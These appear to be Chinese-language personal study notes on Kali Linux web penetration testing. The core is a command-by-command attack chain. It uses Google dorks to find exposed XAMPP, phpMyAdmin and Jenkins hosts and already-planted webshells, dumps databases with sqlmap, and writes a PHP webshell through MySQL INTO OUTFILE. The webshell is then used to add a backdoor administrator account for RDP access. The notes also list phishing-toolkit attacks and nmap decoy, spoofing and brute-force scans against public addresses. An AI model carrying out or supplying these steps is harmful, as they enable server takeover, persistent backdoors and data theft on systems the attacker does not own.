kali linux web渗透测试学习笔记
第一步:启用Postgresql服务。service postgresql start
第二步:启用metasploit服务。service matasploit start
第三步:启动框架。msfconsole
1.网址:asp?ID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess
2.转用sqlmap工具测试,命令:sqlmap -u 目标网址 --dbs --current-user
拆解表名
命令:sqlmap -u 目标网址 --tables,线程数最大为10,基于字典拆解表名,得到的表可能不全面。
1.拆解一个表的列名
命令:sqlmap -u 目标网址 -T 表名 --columns
2.得到感兴趣的字段的值
命令:sqlmap -u 目标网址 -T 表名 -C 列名1,列名2,列名3 --dump
找到登录按钮
教训:数据库密码一定要加密!
index.php?id=1,同上,得到数据库为mysql
1.扫描数据库
命令:sqlmap -u 目标网址 --dbs --current-user
2.扫描某个数据库的表
命令:sqlmap -u 目标网址 --dbms mysql-D 数据库名 --tables,参数可自行选择
查看表字段
同上
利用nikto帮助寻找隐藏目录,利用网页源代码中的隐藏信息寻找管理后台
命令:nikto -host 目标网站
将找到的路径放进去查看,一个个试试,附加上查看源代码,找manage
提升管理员权限:
用fiddler看看页面情况,查看系统返回的代码,编辑建立HTML文件,运行,设置fiddler(auto),将返回结果保存在本地。
返回页面
1.寻找持续构建工具Jenkins管理面板,有可能获取某些项目的源代码或者敏感信息;
2.综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西
3.后门查找
4.关于Google hack database
Google hack语法查询:http://www.xuanhun521.com
寻找持续构建工具Jenkins(一个源代码构建工具,可以查看开发人员,项目,源代码)管理面板
1.inurl:8080 intitle:"Dashboard [Jenkins]" 造成源代码泄露
综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西
寻找安装xampp的主机:inurl:"xampp/index" intext:"XAMPP for Windows"
1)寻找phpmyadmin不用验证或者弱口令管理页面,通过mysql的root权限插入一句话木马提取,获取服务器管理权限
1>>有用信息:phpinfo。可以看到网站目录;phpmyadmin管理入口,看权限菜单,添加用户
2>>连接网站的mysql服务器
命令:mysql -u 你添加的用户名 -h 你找的网站ip -p 你添加的账户密码
use mysql
3>>创建表
4>>向表中插入数据,其实插入的是一段命令,调用cmd并且在系统环境下执行
命令:INSERT INTO aa (packet) VALUES('<pre><body bgcolor=silver><? @sysytem($_GET["cmd"]); ?></body></pre>')
5>>select * into outfile ' / / / /aa.php ' from aa,这里的路径应该是可执行的。可以将路径粘贴下来,写如phpinfo的路径
6>>访问这个网站地址。........../aa.php
7>>好了,接下来我们前面插入的那句话就要起作用啦。试着访问........../aa.php?cmd=dir,这里可以写好多命令哦
8>>接下来创建账号cmd=net user 小明 123456 /add ,创建成功!
9>>将我们创建的账户添加到管理员用户组cmd=net localgroup administrators 小明 /add
10>>启动mstsc,远程连接,用户名和密码就是我们刚刚创建的小明和123456
Google搜索目标:intitle:"=[1n73ct10n privat shell]="
intitle:"WSO 2.4"[Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]
http://www.exploit-db.com/google-dorks/
SET是开源的社会工程学利用套件,通常结合metasploit来使用,项目地址:http://github.com/trustedsec/social-engineer-toolkit
进入kali,用命令setoolkit启动,选1。攻击方法:
鱼叉式钓鱼攻击(通过邮件,发送有问题邮件),网站攻击,介质感染攻击,群发邮件攻击,基于Arduino的攻击,短信欺骗攻击,无线接入点攻击,二维码攻击,powershell攻击
主机扫描:
namp -sL 103.10.87.1-255 列表扫描
nmap -PE IP
nmap -Pn IP(不适用ping扫描,更适用于Internet)
nmap -sP IP(快速ping扫描),用来快速发现存活主机
-sn参数,只探测存活主机,不管端口啥的
尝试多种扫描方式,来扫描主机
端口扫描:
nmap -sS IP
nmap -sT IP ;TCP端口扫描
nmap -sU IP; UDP端口扫描
nmap -sU -p 80,445 IP ;指定端口
nmap -sT -v IP启用细节模式
操作系统探测:
参数:
-O(启用操作系统检测)
-osscan-limit(针对指定的目标进行操作系统检测)
--osscan-guess;--fuzzy(推测OS检测结果,在nmap不能给出确定结果的情况下使用)
示例:
nmap -sT -O IP
nmap -sT -p 3390 -O --osscan-limit IP (只有打开3390端口,才进行操作系统版本探测)
namp -sA -O IP
服务程序探测:
nmap -sA -sV IP 扫描方式ACK ;扫描某台主机的服务程序
nmap -sV -p 22,53,110 ;扫描某个服务的服务程序
nmap高级用法:
nmap --iflist(查看本地路由与接口) 可以看到网关地址,网络接口啥的
nmap -e 08:00:27:47:63:E6 IP(指定mac和IP地址)(本地有多个网络接口时
nmap -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.103(地址诱骗)前面地址都是虚假的,后面的才是真的
nmap -sV --spoof -mac 08:00:27:47:63:E6 IP(虚假mac地址)
nmap -sV --source-port 900 IP --source-port(指定源端口)
nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(扫描思科路由器)
nmap -sU -p69 -nvv 192.168.1.253(扫描路由器的tftp协议)
nmap -O -F -n 103.10.87.148(-F快速扫描) 扫描常见的端口
nmap --script=brute 103.10.87.148(暴力破解)
参考资料:http://drops.wooyun.org/tips/2188
专注于网络端口的扫描
官方站点:http://zmap.io/
源码:https://github.com/zmap/zmap
zmap安装及使用:链接:http://pan.baidu.com/s/1bp7ddhl 密码:ypbr (pan 百度云盘)
默认情况使用SYN扫描方式